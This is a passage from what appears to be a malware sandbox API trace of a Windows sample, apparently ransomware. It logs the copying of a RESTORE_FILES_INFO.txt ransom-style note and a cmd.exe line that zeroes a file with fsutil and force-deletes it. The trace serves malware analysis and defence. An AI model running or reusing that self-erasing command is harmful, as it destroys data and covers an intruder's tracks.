lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x6e [0256.325] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.328] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.328] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.328] CoTaskMemFree (pv=0x720748) [0256.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.328] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.329] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.329] CoTaskMemFree (pv=0x720748) [0256.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.329] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x77c590 [0256.329] LocalAlloc (uFlags=0x0, uBytes=0x7a) returned 0x6fe628 [0256.982] LocalFree (hMem=0x77c590) returned 0x0 [0256.982] LocalFree (hMem=0x6fe628) returned 0x0 [0256.991] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0256.991] CreatePipe (in: hReadPipe=0x26e8a4, hWritePipe=0x26e8a0, lpPipeAttributes=0x26e824, nSize=0x0 | out: hReadPipe=0x26e8a4*=0x548, hWritePipe=0x26e8a0*=0x4b0) returned 1 [0256.991] GetCurrentProcess () returned 0xffffffff [0256.991] GetCurrentProcess () returned 0xffffffff [0256.991] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x548, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e8a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e8a8*=0x58c) returned 1 [0256.991] CloseHandle (hObject=0x548) returned 1 [0256.992] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0256.992] CoTaskMemAlloc (cb=0x20e) returned 0x720748 [0256.992] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x720748 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0256.992] CoTaskMemFree (pv=0x720748) [0256.992] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e750*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x6ddbf44 | out: lpCommandLine="\"cmd.exe\" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”", lpProcessInformation=0x6ddbf44*(hProcess=0x590, hThread=0x548, dwProcessId=0xba8, dwThreadId=0xdac)) returned 1 [0257.002] CloseHandle (hObject=0x4b0) returned 1 [0257.002] GetFileType (hFile=0x58c) returned 0x3 [0257.003] CloseHandle (hObject=0x548) returned 1 [0257.003] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe", nBufferLength=0x105, lpBuffer=0x26e46c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe", lpFilePart=0x0) returned 0x46 [0257.003] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x72d200 [0257.003] LocalAlloc (uFlags=0x0, uBytes=0xd6) returned 0x617a5c8 [0257.233] LocalFree (hMem=0x72d200) returned 0x0 [0257.233] LocalFree (hMem=0x617a5c8) returned 0x0 [0257.234] CoGetContextToken (in: pToken=0x26e898 | out: pToken=0x26e898) returned 0x0 [0257.234] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e8bc | out: ppvObject=0x26e8bc*=0x6ded34) returned 0x0 [0257.234] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x26e91c | out: pThreadType=0x26e91c*=0) returned 0x0 [0257.234] IUnknown:Release (This=0x6ded34) returned 0x1 [0257.235] CoGetContextToken (in: pToken=0x26e5b4 | out: pToken=0x26e5b4) returned 0x0 [0257.235] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5d8 | out: ppvObject=0x26e5d8*=0x6ded34) returned 0x0 [0257.235] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x26e604 | out: pThreadType=0x26e604*=0) returned 0x0 [0257.235] IUnknown:Release (This=0x6ded34) returned 0x1 [0257.236] CoGetContextToken (in: pToken=0x26e5b4 | out: pToken=0x26e5b4) returned 0x0 [0257.236] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5d8 | out: ppvObject=0x26e5d8*=0x6ded34) returned 0x0 [0257.236] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x26e604 | out: pThreadType=0x26e604*=0) returned 0x0 [0257.236] IUnknown:Release (This=0x6ded34) returned 0x1 [0257.257] CoGetContextToken (in: pToken=0x26e5b4 | out: pToken=0x26e5b4) returned 0x0 [0257.257] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5d8 | out: ppvObject=0x26e5d8*=0x6ded34) returned 0x0 [0257.257] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x26e604 | out: pThreadType=0x26e604*=0) returned 0x0 [0257.257] IUnknown:Release (This=0x6ded34) returned 0x1 [0257.259] CoGetContextToken (in: pToken=0x26e5cc | out: pToken=0x26e5cc) returned 0x0 [0257.259] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5f0 | out: ppvObject=0x26e5f0*=0x6ded34) returned 0x0 [0257.259] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x26e61c | out: pThreadType=0x26e61c*=0) returned 0x0 [0257.259] IUnknown:Release (This=0x6ded34) returned 0x1 [0257.326] CoUninitialize () Thread: id = 6 os_tid = 0x7a8 Thread: id = 7 os_tid = 0x564 [0052.301] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0066.483] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0066.483] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.483] WbemLocator:IUnknown:Release (This=0x5210cf0) returned 0x1 [0066.483] WbemLocator:IUnknown:Release (This=0x5210cf0) returned 0x0 [0066.483] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.483] IUnknown:Release (This=0x5222090) returned 0x2 [0066.483] IUnknown:Release (This=0x5222090) returned 0x1 [0066.484] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.484] WbemLocator:IUnknown:Release (This=0x5222080) returned 0x1 [0066.484] WbemLocator:IUnknown:Release (This=0x5222080) returned 0x0 [0066.484] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0066.484] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.484] WbemDefPath:IUnknown:Release (This=0x5210820) returned 0x1 [0066.484] WbemDefPath:IUnknown:Release (This=0x5210820) returned 0x0 [0066.491] IUnknown:Release (This=0x5227570) returned 0x0 [0066.491] IUnknown:Release (This=0x5222090) returned 0x0 [0066.492] CoGetContextToken (in: pToken=0x438f800 | out: pToken=0x438f800) returned 0x0 [0066.492] WbemLocator:IUnknown:Release (This=0x70f6ec) returned 0x1 [0066.492] IUnknown:Release (This=0x5221f7c) returned 0x0 [0066.632] IUnknown:Release (This=0x5221c28) returned 0x0 [0066.633] CloseHandle (hObject=0x29c) returned 1 [0066.634] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0066.634] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.634] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x1 [0066.634] WbemLocator:IUnknown:Release (This=0x5228e84) returned 0x0 [0066.674] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0066.674] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.674] WbemDefPath:IUnknown:Release (This=0x5226d78) returned 0x1 [0066.674] WbemDefPath:IUnknown:Release (This=0x5226d78) returned 0x0 [0066.674] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.674] WbemDefPath:IUnknown:Release (This=0x5221fc8) returned 0x1 [0066.674] WbemDefPath:IUnknown:Release (This=0x5221fc8) returned 0x0 [0066.674] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.674] WbemDefPath:IUnknown:Release (This=0x5227410) returned 0x1 [0066.674] WbemDefPath:IUnknown:Release (This=0x5227410) returned 0x0 [0066.783] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0066.783] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.783] WbemDefPath:IUnknown:Release (This=0x5210b30) returned 0x1 [0066.783] WbemDefPath:IUnknown:Release (This=0x5210b30) returned 0x0 [0066.783] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.783] WbemDefPath:IUnknown:Release (This=0x521cb98) returned 0x1 [0066.783] WbemDefPath:IUnknown:Release (This=0x521cb98) returned 0x0 [0066.783] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0066.783] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0066.783] WbemLocator:IUnknown:Release (This=0x70f4fc) returned 0x1 [0066.784] WbemLocator:IUnknown:Release (This=0x521d4f4) returned 0x0 [0066.815] IUnknown:Release (This=0x6ded28) returned 0x0 [0069.955] RegCloseKey (hKey=0x2a0) returned 0x0 [0069.955] RegCloseKey (hKey=0x29c) returned 0x0 [0069.955] RegCloseKey (hKey=0x2a4) returned 0x0 [0084.208] RegCloseKey (hKey=0x2c4) returned 0x0 [0084.208] CloseHandle (hObject=0x388) returned 1 [0084.208] CloseHandle (hObject=0x338) returned 1 [0084.209] CloseHandle (hObject=0x2cc) returned 1 [0084.209] CloseHandle (hObject=0x3b8) returned 1 [0084.209] CloseHandle (hObject=0x3c8) returned 1 [0084.209] CloseHandle (hObject=0x38c) returned 1 [0084.209] CloseHandle (hObject=0x2f0) returned 1 [0084.209] CloseHandle (hObject=0x3a8) returned 1 [0084.209] CloseHandle (hObject=0x3c0) returned 1 [0084.210] CloseHandle (hObject=0x394) returned 1 [0084.210] CloseHandle (hObject=0x39c) returned 1 [0084.210] CloseHandle (hObject=0x340) returned 1 [0084.210] SysStringLen (param_1="狔מ뿓䢉⡟鰴⯆erArchit") returned 0x10 [0084.210] CloseHandle (hObject=0x334) returned 1 [0084.210] CloseHandle (hObject=0x2e8) returned 1 [0084.211] CloseHandle (hObject=0x30c) returned 1 [0084.211] CloseHandle (hObject=0x3b0) returned 1 [0084.211] CloseHandle (hObject=0x2f8) returned 1 [0084.211] CloseHandle (hObject=0x2e4) returned 1 [0084.212] CloseHandle (hObject=0x324) returned 1 [0084.212] CloseHandle (hObject=0x348) returned 1 [0084.300] CloseHandle (hObject=0x2b4) returned 1 [0084.314] CloseHandle (hObject=0x2b8) returned 1 [0090.931] CloseHandle (hObject=0x438) returned 1 [0090.931] CloseHandle (hObject=0x430) returned 1 [0090.931] CloseHandle (hObject=0x424) returned 1 [0090.931] CloseHandle (hObject=0x41c) returned 1 [0090.931] CloseHandle (hObject=0x418) returned 1 [0090.932] CloseHandle (hObject=0x408) returned 1 [0090.932] CloseHandle (hObject=0x404) returned 1 [0090.932] CloseHandle (hObject=0x3f8) returned 1 [0090.932] CloseHandle (hObject=0x3f0) returned 1 [0090.932] CloseHandle (hObject=0x3c4) returned 1 [0090.932] CloseHandle (hObject=0x3b4) returned 1 [0090.932] CloseHandle (hObject=0x3a0) returned 1 [0090.932] CloseHandle (hObject=0x390) returned 1 [0090.932] CloseHandle (hObject=0x2f4) returned 1 [0090.932] CloseHandle (hObject=0x2ec) returned 1 [0090.933] CloseHandle (hObject=0x2c4) returned 1 [0090.933] CloseHandle (hObject=0x338) returned 1 [0090.933] CloseHandle (hObject=0x3b8) returned 1 [0090.933] CloseHandle (hObject=0x38c) returned 1 [0090.933] CloseHandle (hObject=0x3a8) returned 1 [0090.933] CloseHandle (hObject=0x42c) returned 1 [0090.933] CloseHandle (hObject=0x414) returned 1 [0090.933] CloseHandle (hObject=0x380) returned 1 [0090.934] CloseHandle (hObject=0x3cc) returned 1 [0090.934] CloseHandle (hObject=0x388) returned 1 [0090.934] CloseHandle (hObject=0x434) returned 1 [0090.934] CloseHandle (hObject=0x2f0) returned 1 [0090.934] CloseHandle (hObject=0x3f4) returned 1 [0090.934] CloseHandle (hObject=0x3fc) returned 1 [0090.934] CloseHandle (hObject=0x3ac) returned 1 [0090.934] CloseHandle (hObject=0x2cc) returned 1 [0090.934] CloseHandle (hObject=0x3c0) returned 1 [0090.934] CloseHandle (hObject=0x344) returned 1 [0090.935] CloseHandle (hObject=0x410) returned 1 [0090.935] CloseHandle (hObject=0x420) returned 1 [0090.935] CloseHandle (hObject=0x34c) returned 1 [0090.935] CloseHandle (hObject=0x2e0) returned 1 [0090.935] CloseHandle (hObject=0x3bc) returned 1 [0090.935] CloseHandle (hObject=0x398) returned 1 [0090.935] CloseHandle (hObject=0x3c8) returned 1 [0091.051] CloseHandle (hObject=0x2f8) returned 1 [0091.051] CloseHandle (hObject=0x3b0) returned 1 [0091.051] CloseHandle (hObject=0x3d4) returned 1 [0091.052] CloseHandle (hObject=0x37c) returned 1 [0091.052] CloseHandle (hObject=0x3e0) returned 1 [0091.052] CloseHandle (hObject=0x394) returned 1 [0092.091] CloseHandle (hObject=0x440) returned 1 [0092.091] CloseHandle (hObject=0x43c) returned 1 [0097.600] CloseHandle (hObject=0x3a0) returned 1 [0097.600] CloseHandle (hObject=0x2f4) returned 1 [0097.600] CloseHandle (hObject=0x2c4) returned 1 [0097.600] CloseHandle (hObject=0x3b8) returned 1 [0097.600] CloseHandle (hObject=0x3a8) returned 1 [0097.601] CloseHandle (hObject=0x414) returned 1 [0097.601] CloseHandle (hObject=0x3cc) returned 1 [0097.601] CloseHandle (hObject=0x434) returned 1 [0097.601] CloseHandle (hObject=0x3f4) returned 1 [0097.601] CloseHandle (hObject=0x3ac) returned 1 [0097.601] CloseHandle (hObject=0x40c) returned 1 [0097.601] CloseHandle (hObject=0x2f8) returned 1 [0097.601] CloseHandle (hObject=0x3d4) returned 1 [0097.601] CloseHandle (hObject=0x2ec) returned 1 [0097.601] CloseHandle (hObject=0x3fc) returned 1 [0097.601] CloseHandle (hObject=0x3bc) returned 1 [0097.602] CloseHandle (hObject=0x388) returned 1 [0097.602] CloseHandle (hObject=0x390) returned 1 [0097.602] CloseHandle (hObject=0x380) returned 1 [0097.602] CloseHandle (hObject=0x338) returned 1 [0097.602] CloseHandle (hObject=0x398) returned 1 [0097.602] CloseHandle (hObject=0x42c) returned 1 [0097.602] CloseHandle (hObject=0x2cc) returned 1 [0097.602] CloseHandle (hObject=0x38c) returned 1 [0097.602] CloseHandle (hObject=0x2fc) returned 1 [0097.602] CloseHandle (hObject=0x2f0) returned 1 [0097.704] CloseHandle (hObject=0x440) returned 1 [0097.705] CloseHandle (hObject=0x444) returned 1 [0097.705] CloseHandle (hObject=0x37c) returned 1 [0097.705] CloseHandle (hObject=0x3e0) returned 1 [0097.705] CloseHandle (hObject=0x43c) returned 1 [0097.705] CloseHandle (hObject=0x394) returned 1 [0098.123] CloseHandle (hObject=0x3c4) returned 1 [0098.123] CloseHandle (hObject=0x3b4) returned 1 [0101.860] CloseHandle (hObject=0x460) returned 1 [0101.860] CloseHandle (hObject=0x458) returned 1 [0101.860] CloseHandle (hObject=0x450) returned 1 [0101.860] CloseHandle (hObject=0x438) returned 1 [0101.860] CloseHandle (hObject=0x424) returned 1 [0101.860] CloseHandle (hObject=0x418) returned 1 [0101.861] CloseHandle (hObject=0x404) returned 1 [0101.861] CloseHandle (hObject=0x2f4) returned 1 [0101.861] CloseHandle (hObject=0x3b8) returned 1 [0101.861] CloseHandle (hObject=0x414) returned 1 [0101.861] CloseHandle (hObject=0x434) returned 1 [0101.861] CloseHandle (hObject=0x3f4) returned 1 [0101.861] CloseHandle (hObject=0x448) returned 1 [0101.861] CloseHandle (hObject=0x430) returned 1 [0101.862] CloseHandle (hObject=0x3a8) returned 1 [0101.862] CloseHandle (hObject=0x408) returned 1 [0101.862] CloseHandle (hObject=0x3d4) returned 1 [0101.862] CloseHandle (hObject=0x44c) returned 1 [0101.862] CloseHandle (hObject=0x2c4) returned 1 [0101.862] CloseHandle (hObject=0x3a0) returned 1 [0101.862] CloseHandle (hObject=0x454) returned 1 [0101.862] CloseHandle (hObject=0x3cc) returned 1 [0101.862] CloseHandle (hObject=0x41c) returned 1 [0101.862] CloseHandle (hObject=0x45c) returned 1 [0102.313] CloseHandle (hObject=0x468) returned 1 [0102.314] CloseHandle (hObject=0x3e0) returned 1 [0102.314] CloseHandle (hObject=0x3f0) returned 1 [0102.314] CloseHandle (hObject=0x3c4) returned 1 [0102.314] CloseHandle (hObject=0x37c) returned 1 [0102.315] CloseHandle (hObject=0x394) returned 1 [0102.315] CloseHandle (hObject=0x3b4) returned 1 [0102.315] CloseHandle (hObject=0x464) returned 1 [0102.315] CloseHandle (hObject=0x43c) returned 1 [0102.315] CloseHandle (hObject=0x3c8) returned 1 [0103.224] CloseHandle (hObject=0x3f0) returned 1 [0103.224] CloseHandle (hObject=0x37c) returned 1 [0103.225] CloseHandle (hObject=0x394) returned 1 [0103.225] CloseHandle (hObject=0x3c4) returned 1 [0103.832] CloseHandle (hObject=0x3d4) returned 1 [0103.832] CloseHandle (hObject=0x2c4) returned 1 [0103.833] CloseHandle (hObject=0x3f0) returned 1 [0103.833] CloseHandle (hObject=0x394) returned 1 [0103.833] CloseHandle (hObject=0x454) returned 1 [0103.833] CloseHandle (hObject=0x468) returned 1 [0103.833] CloseHandle (hObject=0x3a0) returned 1 [0103.833] CloseHandle (hObject=0x3c4) returned 1 [0103.833] CloseHandle (hObject=0x44c) returned 1 [0103.833] CloseHandle (hObject=0x38c) returned 1 [0103.833] CloseHandle (hObject=0x3e0) returned 1 [0103.833] CloseHandle (hObject=0x37c) returned 1 [0103.855] CloseHandle (hObject=0x46c) returned 1 [0103.855] CloseHandle (hObject=0x3cc) returned 1 [0103.856] CloseHandle (hObject=0x3b4) returned 1 [0103.856] CloseHandle (hObject=0x43c) returned 1 [0103.856] CloseHandle (hObject=0x3c8) returned 1 [0103.856] CloseHandle (hObject=0x41c) returned 1 [0103.856] CloseHandle (hObject=0x45c) returned 1 [0103.856] CloseHandle (hObject=0x464) returned 1 [0107.639] CloseHandle (hObject=0x4ec) returned 1 [0107.639] CloseHandle (hObject=0x4dc) returned 1 [0107.639] CloseHandle (hObject=0x4d8) returned 1 [0107.639] CloseHandle (hObject=0x4d0) returned 1 [0107.639] CloseHandle (hObject=0x4c8) returned 1 [0107.640] CloseHandle (hObject=0x4c0) returned 1 [0107.640] CloseHandle (hObject=0x4b8) returned 1 [0107.640] CloseHandle (hObject=0x4b0) returned 1 [0107.640] CloseHandle (hObject=0x4a8) returned 1 [0107.640] CloseHandle (hObject=0x4a0) returned 1 [0107.640] CloseHandle (hObject=0x49c) returned 1 [0107.640] CloseHandle (hObject=0x478) returned 1 [0107.640] CloseHandle (hObject=0x474) returned 1 [0107.640] CloseHandle (hObject=0x458) returned 1 [0107.640] CloseHandle (hObject=0x438) returned 1 [0107.640] CloseHandle (hObject=0x418) returned 1 [0107.641] CloseHandle (hObject=0x2f4) returned 1 [0107.641] CloseHandle (hObject=0x414) returned 1 [0107.641] CloseHandle (hObject=0x3f4) returned 1 [0107.641] CloseHandle (hObject=0x2c4) returned 1 [0107.641] CloseHandle (hObject=0x468) returned 1 [0107.641] CloseHandle (hObject=0x424) returned 1 [0107.641] CloseHandle (hObject=0x4b4) returned 1 [0107.641] CloseHandle (hObject=0x3a0) returned 1 [0107.641] CloseHandle (hObject=0x4e4) returned 1 [0107.641] CloseHandle (hObject=0x434) returned 1 [0107.641] CloseHandle (hObject=0x3b4) returned 1 [0107.641] CloseHandle (hObject=0x4c4) returned 1 [0107.642] CloseHandle (hObject=0x404) returned 1 [0107.642] CloseHandle (hObject=0x450) returned 1 [0107.642] CloseHandle (hObject=0x498) returned 1 [0107.642] CloseHandle (hObject=0x4cc) returned 1 [0107.642] CloseHandle (hObject=0x3d4) returned 1 [0107.642] CloseHandle (hObject=0x4e8) returned 1 [0107.642] CloseHandle (hObject=0x494) returned 1 [0107.642] CloseHandle (hObject=0x4bc) returned 1 [0107.642] CloseHandle (hObject=0x3b8) returned 1 [0107.642] CloseHandle (hObject=0x4d4) returned 1 [0107.642] CloseHandle (hObject=0x4ac) returned 1 [0107.642] CloseHandle (hObject=0x460) returned 1 [0107.642] CloseHandle (hObject=0x3f0) returned 1 [0107.643] CloseHandle (hObject=0x4a4) returned 1 [0107.761] CloseHandle (hObject=0x430) returned 1 [0107.761] CloseHandle (hObject=0x44c) returned 1 [0107.761] CloseHandle (hObject=0x41c) returned 1 [0107.761] CloseHandle (hObject=0x38c) returned 1 [0107.761] CloseHandle (hObject=0x3a8) returned 1 [0107.761] CloseHandle (hObject=0x4f0) returned 1 [0107.761] CloseHandle (hObject=0x37c) returned 1 [0107.761] CloseHandle (hObject=0x448) returned 1 [0107.762] CloseHandle (hObject=0x3c4) returned 1 [0107.762] CloseHandle (hObject=0x46c) returned 1 [0107.762] CloseHandle (hObject=0x3e0) returned 1 [0107.762] CloseHandle (hObject=0x464) returned 1 [0107.762] CloseHandle (hObject=0x3cc) returned 1 [0107.762] CloseHandle (hObject=0x408) returned 1 [0113.148] CloseHandle (hObject=0x4dc) returned 1 [0113.148] CloseHandle (hObject=0x4c0) returned 1 [0113.148] CloseHandle (hObject=0x4d0) returned 1 [0113.148] CloseHandle (hObject=0x478) returned 1 [0113.148] CloseHandle (hObject=0x50c) returned 1 [0113.148] CloseHandle (hObject=0x414) returned 1 [0113.148] CloseHandle (hObject=0x4b0) returned 1 [0113.149] CloseHandle (hObject=0x458) returned 1 [0113.149] CloseHandle (hObject=0x500) returned 1 [0113.149] CloseHandle (hObject=0x504) returned 1 [0113.149] CloseHandle (hObject=0x514) returned 1 [0113.149] CloseHandle (hObject=0x4a0) returned 1 [0113.149] CloseHandle (hObject=0x418) returned 1 [0113.149] CloseHandle (hObject=0x2c4) returned 1 [0113.149] CloseHandle (hObject=0x4cc) returned 1 [0113.149] CloseHandle (hObject=0x3b8) returned 1 [0113.150] CloseHandle (hObject=0x474) returned 1 [0113.150] CloseHandle (hObject=0x3f4) returned 1 [0113.150] CloseHandle (hObject=0x4ec) returned 1 [0113.150] CloseHandle (hObject=0x4b8) returned 1 [0113.150] CloseHandle (hObject=0x468) returned 1 [0113.150] CloseHandle (hObject=0x438) returned 1 [0113.150] CloseHandle (hObject=0x49c) returned 1 [0113.150] CloseHandle (hObject=0x4fc) returned 1 [0113.150] CloseHandle (hObject=0x510) returned 1 [0113.150] CloseHandle (hObject=0x498) returned 1 [0113.150] CloseHandle (hObject=0x4d8) returned 1 [0113.150] CloseHandle (hObject=0x508) returned 1 [0113.151] CloseHandle (hObject=0x2f4) returned 1 [0113.151] CloseHandle (hObject=0x4d4) returned 1 [0113.151] CloseHandle (hObject=0x4c8) returned 1 [0113.151] CloseHandle (hObject=0x4a8) returned 1 [0113.568] CloseHandle (hObject=0x448) returned 1 [0113.568] CloseHandle (hObject=0x464) returned 1 [0113.568] CloseHandle (hObject=0x47c) returned 1 [0113.568] CloseHandle (hObject=0x460) returned 1 [0113.568] CloseHandle (hObject=0x3f0) returned 1 [0113.568] CloseHandle (hObject=0x4f4) returned 1 [0113.569] CloseHandle (hObject=0x430) returned 1 [0113.569] CloseHandle (hObject=0x3c4) returned 1 [0113.570] CloseHandle (hObject=0x4e0) returned 1 [0113.570] CloseHandle (hObject=0x3cc) returned 1 [0113.570] CloseHandle (hObject=0x46c) returned 1 [0113.570] CloseHandle (hObject=0x4a4) returned 1 [0126.828] CoGetContextToken (in: pToken=0x438f9e0 | out: pToken=0x438f9e0) returned 0x0 [0126.828] CoGetContextToken (in: pToken=0x438f968 | out: pToken=0x438f968) returned 0x0 [0126.828] WbemLocator:IUnknown:Release (This=0x73fecc) returned 0x1 [0126.828] WbemLocator:IUnknown:Release (This=0x764c7c) returned 0x0 [0136.562] CloseHandle (hObject=0x200) returned 1 [0136.562] CloseHandle (hObject=0x534) returned 1 [0136.562] CloseHandle (hObject=0x2c4) returned 1 [0136.563] CloseHandle (hObject=0x4c8) returned 1 [0136.563] CloseHandle (hObject=0x47c) returned 1 [0136.563] CloseHandle (hObject=0x568) returned 1 [0136.563] CloseHandle (hObject=0x524) returned 1 [0136.563] CloseHandle (hObject=0x550) returned 1 [0136.563] CloseHandle (hObject=0x540) returned 1 [0136.563] CloseHandle (hObject=0x5a8) returned 1 [0136.564] CloseHandle (hObject=0x558) returned 1 [0136.564] CloseHandle (hObject=0x580) returned 1 [0136.564] CloseHandle (hObject=0x174) returned 1 [0136.564] CloseHandle (hObject=0x500) returned 1 [0136.564] CloseHandle (hObject=0x4f8) returned 1 [0136.565] CloseHandle (hObject=0x560) returned 1 [0136.565] CloseHandle (hObject=0x514) returned 1 [0136.565] CloseHandle (hObject=0x598) returned 1 [0136.565] CloseHandle (hObject=0x444) returned 1 [0136.565] CloseHandle (hObject=0x4d0) returned 1 [0136.712] CloseHandle (hObject=0x478) returned 1 [0136.712] CloseHandle (hObject=0x4a0) returned 1 [0136.712] CloseHandle (hObject=0x52c) returned 1 [0136.713] CloseHandle (hObject=0x4e0) returned 1 [0136.713] CloseHandle (hObject=0x464) returned 1 [0136.713] CloseHandle (hObject=0x418) returned 1 [0136.713] CloseHandle (hObject=0x4a4) returned 1 [0136.713] CloseHandle (hObject=0x3c4) returned 1 [0136.713] CloseHandle (hObject=0x5a4) returned 1 [0136.713] CloseHandle (hObject=0x520) returned 1 [0136.713] CloseHandle (hObject=0x588) returned 1 [0136.713] CloseHandle (hObject=0x590) returned 1 [0136.713] CloseHandle (hObject=0x4b0) returned 1 [0136.714] CloseHandle (hObject=0x4f4) returned 1 [0136.714] CloseHandle (hObject=0x46c) returned 1 [0136.714] CloseHandle (hObject=0x50c) returned 1 [0136.714] CloseHandle (hObject=0x5a0) returned 1 [0136.714] CloseHandle (hObject=0x3f0) returned 1 [0136.714] 